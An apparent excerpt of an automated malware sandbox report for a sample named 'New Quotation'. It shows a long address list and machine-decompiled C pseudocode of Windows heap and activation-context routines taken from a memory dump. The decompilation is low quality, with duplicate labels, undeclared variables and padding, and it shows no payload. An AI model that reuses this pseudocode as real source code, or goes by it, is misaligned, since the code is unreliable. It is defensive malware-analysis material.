                                                                                                                                                                                          0x1d7e4d21
                                                                                                                                                                                          0x1d7e4d25
                                                                                                                                                                                          0x1d7e4d25
                                                                                                                                                                                          0x1d7e4d35
                                                                                                                                                                                          0x1d7e4d37
                                                                                                                                                                                          0x1d7e4d39
                                                                                                                                                                                          0x1d7e4d3b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4d3b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4d37
                                                                                                                                                                                          0x1d7e4d43
                                                                                                                                                                                          0x1d7e4d46
                                                                                                                                                                                          0x1d7e4d49
                                                                                                                                                                                          0x1d7e4d4b
                                                                                                                                                                                          0x1d7e4d4d
                                                                                                                                                                                          0x1d7e4d61
                                                                                                                                                                                          0x1d7e4d63
                                                                                                                                                                                          0x1d7e4d66
                                                                                                                                                                                          0x1d7e4d4f
                                                                                                                                                                                          0x1d7e4d4f
                                                                                                                                                                                          0x1d7e4d51
                                                                                                                                                                                          0x1d7e4d54
                                                                                                                                                                                          0x1d7e4d56
                                                                                                                                                                                          0x1d7e4d56
                                                                                                                                                                                          0x1d7e4d6e
                                                                                                                                                                                          0x1d7e4d71
                                                                                                                                                                                          0x1d7e4d77
                                                                                                                                                                                          0x1d7e4d79
                                                                                                                                                                                          0x1d7e4d7f
                                                                                                                                                                                          0x1d7e4d82
                                                                                                                                                                                          0x1d7e4d82
                                                                                                                                                                                          0x1d7e4d85
                                                                                                                                                                                          0x1d7e4d87
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4d89
                                                                                                                                                                                          0x1d7e4d8b
                                                                                                                                                                                          0x1d7e4d8d
                                                                                                                                                                                          0x1d7e4daf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4d8f
                                                                                                                                                                                          0x1d7e4d8f
                                                                                                                                                                                          0x1d7e4d8f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4d8d
                                                                                                                                                                                          0x1d7e4d92
                                                                                                                                                                                          0x1d7e4da3
                                                                                                                                                                                          0x1d7e4da5
                                                                                                                                                                                          0x1d7e4da5
                                                                                                                                                                                          0x1d7e486d
                                                                                                                                                                                          0x1d7e486d
                                                                                                                                                                                          0x1d7e4870
                                                                                                                                                                                          0x1d7e4873
                                                                                                                                                                                          0x1d7e4877
                                                                                                                                                                                          0x1d7e487b
                                                                                                                                                                                          0x1d7e4881
                                                                                                                                                                                          0x1d7e4887
                                                                                                                                                                                          0x1d7e488a
                                                                                                                                                                                          0x1d7e488c
                                                                                                                                                                                          0x1d7e4b13
                                                                                                                                                                                          0x1d7e4892
                                                                                                                                                                                          0x1d7e4892
                                                                                                                                                                                          0x1d7e4892
                                                                                                                                                                                          0x1d7e4895
                                                                                                                                                                                          0x1d7e4897
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4899
                                                                                                                                                                                          0x1d7e489b
                                                                                                                                                                                          0x1d7e489d
                                                                                                                                                                                          0x1d7e4b06
                                                                                                                                                                                          0x1d7e4b08
                                                                                                                                                                                          0x1d7e4b0b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e48a3
                                                                                                                                                                                          0x1d7e48a3
                                                                                                                                                                                          0x1d7e48a6
                                                                                                                                                                                          0x1d7e48a6
                                                                                                                                                                                          0x1d7e48a6
                                                                                                                                                                                          0x1d7e48a9
                                                                                                                                                                                          0x1d7e48b3
                                                                                                                                                                                          0x1d7e48b6
                                                                                                                                                                                          0x1d7e48bd
                                                                                                                                                                                          0x1d7e48c0
                                                                                                                                                                                          0x1d7e48c3
                                                                                                                                                                                          0x1d7e48c6
                                                                                                                                                                                          0x1d7e48c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e48ca
                                                                                                                                                                                          0x1d7e4aea
                                                                                                                                                                                          0x1d7e4aea
                                                                                                                                                                                          0x1d7e4aec
                                                                                                                                                                                          0x1d7e4af9
                                                                                                                                                                                          0x1d7e4af9
                                                                                                                                                                                          0x1d7e4afb
                                                                                                                                                                                          0x1d7e4afe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4afe
                                                                                                                                                                                          0x1d7e4aee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e48d1
                                                                                                                                                                                          0x1d7e48d1
                                                                                                                                                                                          0x1d7e48d4
                                                                                                                                                                                          0x1d7e48d7
                                                                                                                                                                                          0x1d7e48d9
                                                                                                                                                                                          0x1d7e48df
                                                                                                                                                                                          0x1d7e48e3
                                                                                                                                                                                          0x1d7e48e5
                                                                                                                                                                                          0x1d7e48e8
                                                                                                                                                                                          0x1d7e4901
                                                                                                                                                                                          0x1d7e4903
                                                                                                                                                                                          0x1d7e4915
                                                                                                                                                                                          0x1d7e491a
                                                                                                                                                                                          0x1d7e491a
                                                                                                                                                                                          0x1d7e4903
                                                                                                                                                                                          0x1d7e4923
                                                                                                                                                                                          0x1d7e4925
                                                                                                                                                                                          0x1d7e492b
                                                                                                                                                                                          0x1d7e492d
                                                                                                                                                                                          0x1d7e4938
                                                                                                                                                                                          0x1d7e493b
                                                                                                                                                                                          0x1d7e493e
                                                                                                                                                                                          0x1d7e4940
                                                                                                                                                                                          0x1d7e4946
                                                                                                                                                                                          0x1d7e494a
                                                                                                                                                                                          0x1d7e494c
                                                                                                                                                                                          0x1d7e494f
                                                                                                                                                                                          0x1d7e4968
                                                                                                                                                                                          0x1d7e496a
                                                                                                                                                                                          0x1d7e497c
                                                                                                                                                                                          0x1d7e4981
                                                                                                                                                                                          0x1d7e4981
                                                                                                                                                                                          0x1d7e496a
                                                                                                                                                                                          0x1d7e498a
                                                                                                                                                                                          0x1d7e498c
                                                                                                                                                                                          0x1d7e4992
                                                                                                                                                                                          0x1d7e4994
                                                                                                                                                                                          0x1d7e499d
                                                                                                                                                                                          0x1d7e49a0
                                                                                                                                                                                          0x1d7e4a3a
                                                                                                                                                                                          0x1d7e4a3a
                                                                                                                                                                                          0x1d7e4a3f
                                                                                                                                                                                          0x1d7e4a4c
                                                                                                                                                                                          0x1d7e4a52
                                                                                                                                                                                          0x1d7e4a5d
                                                                                                                                                                                          0x1d7e4a5d
                                                                                                                                                                                          0x1d7e4a5f
                                                                                                                                                                                          0x1d7e4a62
                                                                                                                                                                                          0x1d7e4a62
                                                                                                                                                                                          0x1d7e4a68
                                                                                                                                                                                          0x1d7e4a6e
                                                                                                                                                                                          0x1d7e4a70
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4a72
                                                                                                                                                                                          0x1d7e4a74
                                                                                                                                                                                          0x1d7e4a7e
                                                                                                                                                                                          0x1d7e4a80
                                                                                                                                                                                          0x1d7e4af6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4a76
                                                                                                                                                                                          0x1d7e4a76
                                                                                                                                                                                          0x1d7e4a79
                                                                                                                                                                                          0x1d7e4a7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4a7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4a74
                                                                                                                                                                                          0x1d7e4a82
                                                                                                                                                                                          0x1d7e4a85
                                                                                                                                                                                          0x1d7e4aae
                                                                                                                                                                                          0x1d7e4ab1
                                                                                                                                                                                          0x1d7e4ab3
                                                                                                                                                                                          0x1d7e4acb
                                                                                                                                                                                          0x1d7e4acb
                                                                                                                                                                                          0x1d7e4ab5
                                                                                                                                                                                          0x1d7e4abc
                                                                                                                                                                                          0x1d7e4abc
                                                                                                                                                                                          0x1d7e4a87
                                                                                                                                                                                          0x1d7e4a87
                                                                                                                                                                                          0x1d7e4a8a
                                                                                                                                                                                          0x1d7e4a8c
                                                                                                                                                                                          0x1d7e4aa4
                                                                                                                                                                                          0x1d7e4a8e
                                                                                                                                                                                          0x1d7e4a8e
                                                                                                                                                                                          0x1d7e4a8e
                                                                                                                                                                                          0x1d7e4a8c
                                                                                                                                                                                          0x1d7e4ad1
                                                                                                                                                                                          0x1d7e4ad3
                                                                                                                                                                                          0x1d7e4ad9
                                                                                                                                                                                          0x1d7e4add
                                                                                                                                                                                          0x1d7e4adf
                                                                                                                                                                                          0x1d7e4adf
                                                                                                                                                                                          0x1d7e4adf
                                                                                                                                                                                          0x1d7e4ae4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e49a6
                                                                                                                                                                                          0x1d7e49aa
                                                                                                                                                                                          0x1d7e49ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e49b3
                                                                                                                                                                                          0x1d7e49b3
                                                                                                                                                                                          0x1d7e49b6
                                                                                                                                                                                          0x1d7e49ba
                                                                                                                                                                                          0x1d7e49bc
                                                                                                                                                                                          0x1d7e49bc
                                                                                                                                                                                          0x1d7e49bc
                                                                                                                                                                                          0x1d7e49c1
                                                                                                                                                                                          0x1d7e49c4
                                                                                                                                                                                          0x1d7e49c4
                                                                                                                                                                                          0x1d7e49c6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e49c8
                                                                                                                                                                                          0x1d7e49cb
                                                                                                                                                                                          0x1d7e49cd
                                                                                                                                                                                          0x1d7e49d3
                                                                                                                                                                                          0x1d7e49d7
                                                                                                                                                                                          0x1d7e49d9
                                                                                                                                                                                          0x1d7e49dc
                                                                                                                                                                                          0x1d7e49f5
                                                                                                                                                                                          0x1d7e49f7
                                                                                                                                                                                          0x1d7e4a07
                                                                                                                                                                                          0x1d7e4a07
                                                                                                                                                                                          0x1d7e49f7
                                                                                                                                                                                          0x1d7e4a12
                                                                                                                                                                                          0x1d7e4a14
                                                                                                                                                                                          0x1d7e4a1a
                                                                                                                                                                                          0x1d7e4a1c
                                                                                                                                                                                          0x1d7e4a28
                                                                                                                                                                                          0x1d7e4a2a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4a1e
                                                                                                                                                                                          0x1d7e4a1e
                                                                                                                                                                                          0x1d7e4a20
                                                                                                                                                                                          0x1d7e4a20
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4a1c
                                                                                                                                                                                          0x1d7e4a2f
                                                                                                                                                                                          0x1d7e4a32
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4a32
                                                                                                                                                                                          0x1d7e49ad
                                                                                                                                                                                          0x1d7e4996
                                                                                                                                                                                          0x1d7e4996
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4996
                                                                                                                                                                                          0x1d7e492f
                                                                                                                                                                                          0x1d7e492f
                                                                                                                                                                                          0x1d7e4ae7
                                                                                                                                                                                          0x1d7e4ae7
                                                                                                                                                                                          0x1d7e4ae7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e492d
                                                                                                                                                                                          0x1d7e48a6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e489d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4892
                                                                                                                                                                                          0x1d7e4b15
                                                                                                                                                                                          0x1d7e4b15
                                                                                                                                                                                          0x1d7e4b18
                                                                                                                                                                                          0x1d7e4b18
                                                                                                                                                                                          0x1d7e4b1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4b1c
                                                                                                                                                                                          0x1d7e4b20
                                                                                                                                                                                          0x1d7e4b3c
                                                                                                                                                                                          0x1d7e4b40
                                                                                                                                                                                          0x1d7e4b22
                                                                                                                                                                                          0x1d7e4b22
                                                                                                                                                                                          0x1d7e4b25
                                                                                                                                                                                          0x1d7e4b28
                                                                                                                                                                                          0x1d7e4b2b
                                                                                                                                                                                          0x1d7e4b2d
                                                                                                                                                                                          0x1d7e4b2d
                                                                                                                                                                                          0x1d7e4b30
                                                                                                                                                                                          0x1d7e4b30
                                                                                                                                                                                          0x1d7e4b33
                                                                                                                                                                                          0x1d7e4b37
                                                                                                                                                                                          0x1d7e4b37
                                                                                                                                                                                          0x1d7e4b47
                                                                                                                                                                                          0x1d7e4b49
                                                                                                                                                                                          0x1d7e4b4b
                                                                                                                                                                                          0x1d7e4b4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4b4d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4b49
                                                                                                                                                                                          0x1d7e4b55
                                                                                                                                                                                          0x1d7e4b58
                                                                                                                                                                                          0x1d7e4b5b
                                                                                                                                                                                          0x1d7e4b5e
                                                                                                                                                                                          0x1d7e4b60
                                                                                                                                                                                          0x1d7e4b62
                                                                                                                                                                                          0x1d7e4b76
                                                                                                                                                                                          0x1d7e4b76
                                                                                                                                                                                          0x1d7e4b78
                                                                                                                                                                                          0x1d7e4b7b
                                                                                                                                                                                          0x1d7e4b64
                                                                                                                                                                                          0x1d7e4b64
                                                                                                                                                                                          0x1d7e4b66
                                                                                                                                                                                          0x1d7e4b69
                                                                                                                                                                                          0x1d7e4b6b
                                                                                                                                                                                          0x1d7e4b6b
                                                                                                                                                                                          0x1d7e4b83
                                                                                                                                                                                          0x1d7e4b86
                                                                                                                                                                                          0x1d7e4b8c
                                                                                                                                                                                          0x1d7e4b8f
                                                                                                                                                                                          0x1d7e4b91
                                                                                                                                                                                          0x1d7e4b97
                                                                                                                                                                                          0x1d7e4ba0
                                                                                                                                                                                          0x1d7e4ba0
                                                                                                                                                                                          0x1d7e4ba3
                                                                                                                                                                                          0x1d7e4ba5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4ba7
                                                                                                                                                                                          0x1d7e4ba9
                                                                                                                                                                                          0x1d7e4bab
                                                                                                                                                                                          0x1d7e4cad
                                                                                                                                                                                          0x1d7e4caf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4bb1
                                                                                                                                                                                          0x1d7e4bb1
                                                                                                                                                                                          0x1d7e4bb1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4bab
                                                                                                                                                                                          0x1d7e4bb4
                                                                                                                                                                                          0x1d7e4bbd
                                                                                                                                                                                          0x1d7e4bc2
                                                                                                                                                                                          0x1d7e4bc5
                                                                                                                                                                                          0x1d7e4bc8
                                                                                                                                                                                          0x1d7e4bcc
                                                                                                                                                                                          0x1d7e4bcf
                                                                                                                                                                                          0x1d7e4bd1
                                                                                                                                                                                          0x1d7e4bd1
                                                                                                                                                                                          0x1d7e4bd3
                                                                                                                                                                                          0x1d7e4bd9
                                                                                                                                                                                          0x1d7e4be5
                                                                                                                                                                                          0x1d7e4bec
                                                                                                                                                                                          0x1d7e4bee
                                                                                                                                                                                          0x1d7e4bf1
                                                                                                                                                                                          0x1d7e4bf3
                                                                                                                                                                                          0x1d7e4bf3
                                                                                                                                                                                          0x1d7e4bf3
                                                                                                                                                                                          0x1d7e4bf3
                                                                                                                                                                                          0x1d7e4bf6
                                                                                                                                                                                          0x1d7e4bf9
                                                                                                                                                                                          0x1d7e4bfb
                                                                                                                                                                                          0x1d7e4c5d
                                                                                                                                                                                          0x1d7e4c5d
                                                                                                                                                                                          0x1d7e4c60
                                                                                                                                                                                          0x1d7e4c66
                                                                                                                                                                                          0x1d7e4c69
                                                                                                                                                                                          0x1d7e4bfd
                                                                                                                                                                                          0x1d7e4bfd
                                                                                                                                                                                          0x1d7e4c00
                                                                                                                                                                                          0x1d7e4c06
                                                                                                                                                                                          0x1d7e4c0a
                                                                                                                                                                                          0x1d7e4c0c
                                                                                                                                                                                          0x1d7e4c0f
                                                                                                                                                                                          0x1d7e4c28
                                                                                                                                                                                          0x1d7e4c2a
                                                                                                                                                                                          0x1d7e4c3d
                                                                                                                                                                                          0x1d7e4c42
                                                                                                                                                                                          0x1d7e4c42
                                                                                                                                                                                          0x1d7e4c45
                                                                                                                                                                                          0x1d7e4c45
                                                                                                                                                                                          0x1d7e4c4e
                                                                                                                                                                                          0x1d7e4c50
                                                                                                                                                                                          0x1d7e4c56
                                                                                                                                                                                          0x1d7e4c58
                                                                                                                                                                                          0x1d7e4c5b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4c5b
                                                                                                                                                                                          0x1d7e4c6c
                                                                                                                                                                                          0x1d7e4c6e
                                                                                                                                                                                          0x1d7e4c72
                                                                                                                                                                                          0x1d7e4c78
                                                                                                                                                                                          0x1d7e4c80
                                                                                                                                                                                          0x1d7e4c83
                                                                                                                                                                                          0x1d7e4c88
                                                                                                                                                                                          0x1d7e4c8b
                                                                                                                                                                                          0x1d7e4c8b
                                                                                                                                                                                          0x1d7e4c8b
                                                                                                                                                                                          0x1d7e4c8b
                                                                                                                                                                                          0x1d7e4c6e
                                                                                                                                                                                          0x1d7e4b91
                                                                                                                                                                                          0x1d7e4c8e
                                                                                                                                                                                          0x1d7e4c92
                                                                                                                                                                                          0x1d7e4ca0
                                                                                                                                                                                          0x1d7e4ca6
                                                                                                                                                                                          0x1d7e4ca6
                                                                                                                                                                                          0x1d7e4c92
                                                                                                                                                                                          0x1d7e4dbd
                                                                                                                                                                                          0x1d7e4dc0
                                                                                                                                                                                          0x1d7e4dc5
                                                                                                                                                                                          0x1d7e4dc7
                                                                                                                                                                                          0x1d7e4dcb
                                                                                                                                                                                          0x1d7e4dd0
                                                                                                                                                                                          0x1d7e4dda
                                                                                                                                                                                          0x1d7e4ddd
                                                                                                                                                                                          0x1d7e4ddf
                                                                                                                                                                                          0x1d7e4de0
                                                                                                                                                                                          0x1d7e4de4
                                                                                                                                                                                          0x1d7e4de4
                                                                                                                                                                                          0x1d7e4ddd
                                                                                                                                                                                          0x1d7e4dec
                                                                                                                                                                                          0x1d7e4def
                                                                                                                                                                                          0x1d7e4df5
                                                                                                                                                                                          0x1d7e4df8
                                                                                                                                                                                          0x1d7e4dfc
                                                                                                                                                                                          0x1d7e4e05
                                                                                                                                                                                          0x1d7e4e0b
                                                                                                                                                                                          0x1d7e4e0b
                                                                                                                                                                                          0x1d7e4e0b
                                                                                                                                                                                          0x1d7e4e11
                                                                                                                                                                                          0x1d7e4e17
                                                                                                                                                                                          0x1d7e4e1b
                                                                                                                                                                                          0x1d7e4e22
                                                                                                                                                                                          0x1d7e4e2c
                                                                                                                                                                                          0x1d7e4e2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4e22
                                                                                                                                                                                          0x1d7e482e
                                                                                                                                                                                          0x1d7e482e
                                                                                                                                                                                          0x1d7e4834
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4836
                                                                                                                                                                                          0x1d7e483a
                                                                                                                                                                                          0x1d7e483e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e4840
                                                                                                                                                                                          0x1d7e4843
                                                                                                                                                                                          0x1d7e4847
                                                                                                                                                                                          0x1d7e484e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e484e
                                                                                                                                                                                          0x1d7e483e
                                                                                                                                                                                          0x1d7e4834
                                                                                                                                                                                          0x1d7e47f0
                                                                                                                                                                                          0x1d7e47f5
                                                                                                                                                                                          0x1d7e47f8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e47fa
                                                                                                                                                                                          0x1d7e47fd
                                                                                                                                                                                          0x1d7e4801
                                                                                                                                                                                          0x1d7e4e30
                                                                                                                                                                                          0x1d7e4e30
                                                                                                                                                                                          0x1d7e4e30
                                                                                                                                                                                          0x1d7e47f8
                                                                                                                                                                                          0x1d7e4e33
                                                                                                                                                                                          0x1d7e4e35
                                                                                                                                                                                          0x1d7e4e35
                                                                                                                                                                                          0x1d7e3dc7
                                                                                                                                                                                          0x1d7e3dc7
                                                                                                                                                                                          0x1d7e3dcd
                                                                                                                                                                                          0x1d7e3dd7
                                                                                                                                                                                          0x1d7e3ddc
                                                                                                                                                                                          0x1d7e3e00
                                                                                                                                                                                          0x1d7e3e03
                                                                                                                                                                                          0x1d7e3e17
                                                                                                                                                                                          0x1d7e3e1e
                                                                                                                                                                                          0x1d7e3e25
                                                                                                                                                                                          0x1d7e3e6f
                                                                                                                                                                                          0x1d7e3e79
                                                                                                                                                                                          0x1d7e3e7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3e27
                                                                                                                                                                                          0x1d7e3e27
                                                                                                                                                                                          0x1d7e3e31
                                                                                                                                                                                          0x1d7e3e3b
                                                                                                                                                                                          0x1d7e3e42
                                                                                                                                                                                          0x1d7e3e52
                                                                                                                                                                                          0x1d7e3e55
                                                                                                                                                                                          0x1d7e3e5f
                                                                                                                                                                                          0x1d7e3e61
                                                                                                                                                                                          0x1d7e501b
                                                                                                                                                                                          0x1d7e501b
                                                                                                                                                                                          0x1d7e501b
                                                                                                                                                                                          0x1d7e3e05
                                                                                                                                                                                          0x1d7e3e05
                                                                                                                                                                                          0x1d7e3e08
                                                                                                                                                                                          0x1d7e3e0f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3e0f
                                                                                                                                                                                          0x1d7e3dde
                                                                                                                                                                                          0x1d7e3de1
                                                                                                                                                                                          0x1d7e3de4
                                                                                                                                                                                          0x1d7e3deb
                                                                                                                                                                                          0x1d7e3df2
                                                                                                                                                                                          0x1d7e3e80
                                                                                                                                                                                          0x1d7e3e80
                                                                                                                                                                                          0x1d7e3e84
                                                                                                                                                                                          0x1d7e3e88
                                                                                                                                                                                          0x1d7e3e8b
                                                                                                                                                                                          0x1d7e3e8f
                                                                                                                                                                                          0x1d7e3e94
                                                                                                                                                                                          0x1d7e3e9e
                                                                                                                                                                                          0x1d7e3ea1
                                                                                                                                                                                          0x1d7e3ea3
                                                                                                                                                                                          0x1d7e3ea8
                                                                                                                                                                                          0x1d7e3ea8
                                                                                                                                                                                          0x1d7e3ea1
                                                                                                                                                                                          0x1d7e3ead
                                                                                                                                                                                          0x1d7e3eb0
                                                                                                                                                                                          0x1d7e3eb6
                                                                                                                                                                                          0x1d7e3eb6
                                                                                                                                                                                          0x1d7e3eb9
                                                                                                                                                                                          0x1d7e3ebb
                                                                                                                                                                                          0x1d7e3ebd
                                                                                                                                                                                          0x1d7e3ec3
                                                                                                                                                                                          0x1d7e3ec5
                                                                                                                                                                                          0x1d7e3ec5
                                                                                                                                                                                          0x1d7e3ec7
                                                                                                                                                                                          0x1d7e3ec9
                                                                                                                                                                                          0x1d7e3ecb
                                                                                                                                                                                          0x1d7e3f03
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3ecd
                                                                                                                                                                                          0x1d7e3ecd
                                                                                                                                                                                          0x1d7e3ed0
                                                                                                                                                                                          0x1d7e3ed0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3ecb
                                                                                                                                                                                          0x1d7e3ed6
                                                                                                                                                                                          0x1d7e3ed8
                                                                                                                                                                                          0x1d7e3ef7
                                                                                                                                                                                          0x1d7e3ef7
                                                                                                                                                                                          0x1d7e3eda
                                                                                                                                                                                          0x1d7e3eda
                                                                                                                                                                                          0x1d7e3edc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3ede
                                                                                                                                                                                          0x1d7e3ede
                                                                                                                                                                                          0x1d7e3ee1
                                                                                                                                                                                          0x1d7e3ee5
                                                                                                                                                                                          0x1d7e3ee7
                                                                                                                                                                                          0x1d7e3ee7
                                                                                                                                                                                          0x1d7e3ee7
                                                                                                                                                                                          0x1d7e3eef
                                                                                                                                                                                          0x1d7e3eef
                                                                                                                                                                                          0x1d7e3edc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3ed8
                                                                                                                                                                                          0x1d7e3ddc
                                                                                                                                                                                          0x1d7e501e
                                                                                                                                                                                          0x1d7e5025
                                                                                                                                                                                          0x1d7e5033
                                                                                                                                                                                          0x1d7e5041
                                                                                                                                                                                          0x1d7e3d15
                                                                                                                                                                                          0x1d7e3d15
                                                                                                                                                                                          0x1d7e3d19
                                                                                                                                                                                          0x1d7e3d1e
                                                                                                                                                                                          0x1d7e3d24
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3d26
                                                                                                                                                                                          0x1d7e3d26
                                                                                                                                                                                          0x1d7e3d2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3d2e
                                                                                                                                                                                          0x1d7e3d31
                                                                                                                                                                                          0x1d7e3d39
                                                                                                                                                                                          0x1d7e3d47
                                                                                                                                                                                          0x1d7e3d47
                                                                                                                                                                                          0x1d7e3d2c
                                                                                                                                                                                          0x1d7e3d24
                                                                                                                                                                                          0x1d7e3cde
                                                                                                                                                                                          0x1d7e3cec
                                                                                                                                                                                          0x1d7e3cf6
                                                                                                                                                                                          0x1d7e3d04
                                                                                                                                                                                          0x1d7e3d04

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                          • API String ID: 0-3178619729
                                                                                                                                                                                          • Opcode ID: dffa8f067af9241edb5eb7cf1e2dc0d2b785be9305d71eabce0684c83050ad53
                                                                                                                                                                                          • Instruction ID: 2b7a820364b9d795ae234c1ecfcf0958f8c24948630ae16a5bd9a64db411f1f0
                                                                                                                                                                                          • Opcode Fuzzy Hash: dffa8f067af9241edb5eb7cf1e2dc0d2b785be9305d71eabce0684c83050ad53
                                                                                                                                                                                          • Instruction Fuzzy Hash: 76E2D174A00255CFDB15CF68C880BA9BBF1FF48368F15819AE949AB395D734E841CF92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8049F0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                                                                          			E1D8049F0(signed char __eax, void* __ecx, void* __edx, unsigned int _a4) {
				intOrPtr _v0;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				signed int _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t57;
				signed int _t58;
				signed int _t63;
				signed char _t66;
				signed int _t87;
				signed int _t93;
				signed int* _t94;
				signed int _t95;
				void* _t96;
				signed int _t106;
				signed int* _t107;
				signed int _t114;
				signed int _t115;
				void* _t116;
				signed int* _t118;
				signed int _t120;
				signed int _t121;
				void* _t122;
				signed int _t126;
				signed int _t127;
				signed int _t129;

				_t57 = __eax;
				_t127 = _t126 & 0xfffffff8;
				_push(__ecx);
				_t118 = _a4;
				if(_t118 == 0) {
					L5:
					return _t57;
				} else {
					_t114 =  *_t118;
					if(_t114 != 0) {
						while(1) {
							_t57 =  *(_t114 + 8);
							_t93 =  *_t114;
							if((_t57 & 0x00000001) != 0) {
								E1D7D26A0(_t57,  *((intOrPtr*)(_t114 + 4)));
								_t57 =  *(_t114 + 8);
							}
							if((_t57 & 0x00000008) != 0) {
								_t57 = E1D804B79(_t118, _t114);
							}
							_t114 = _t93;
							if(_t93 == 0) {
								goto L2;
							}
						}
					}
					L2:
					 *_t118 =  *_t118 & 0x00000000;
					_t94 =  &(_t118[1]);
					_t115 =  *_t94;
					L3:
					L3:
					if(_t115 != _t94) {
						goto L6;
					} else {
						if((_t118[3] & 0x00000002) == 0) {
							_t57 = E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t118);
						}
					}
					goto L5;
					L6:
					_t58 =  *_t115;
					_t6 = _t115 - 8; // -8
					_t110 = _t6;
					if( *(_t58 + 4) != _t115) {
						L16:
						_t98 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t129 = (_t127 & 0xfffffff8) - 0x5c;
						_t60 =  *0x1d8cb370 ^ _t129;
						_v28 =  *0x1d8cb370 ^ _t129;
						_push(_t94);
						_push(_t118);
						_push(_t115);
						if((_v16 & 0xfffffffe) != 0) {
							_push(_v0);
							_push("RtlDeactivateActivationContext");
							_push("SXS: %s() called with invalid flags 0x%08lx\n");
							goto L33;
						} else {
							_t110 = _a4;
							if(_t110 != 0) {
								if((_t110 & 0xf0000000) != 0x10000000) {
									_push(_t110);
									_push("RtlDeactivateActivationContext");
									_push("SXS: %s() called with invalid cookie type 0x%08Ix\n");
									L33:
									_push(0);
									_push(0x33);
									E1D85EF10();
									_t129 = _t129 + 0x14;
									goto L35;
								} else {
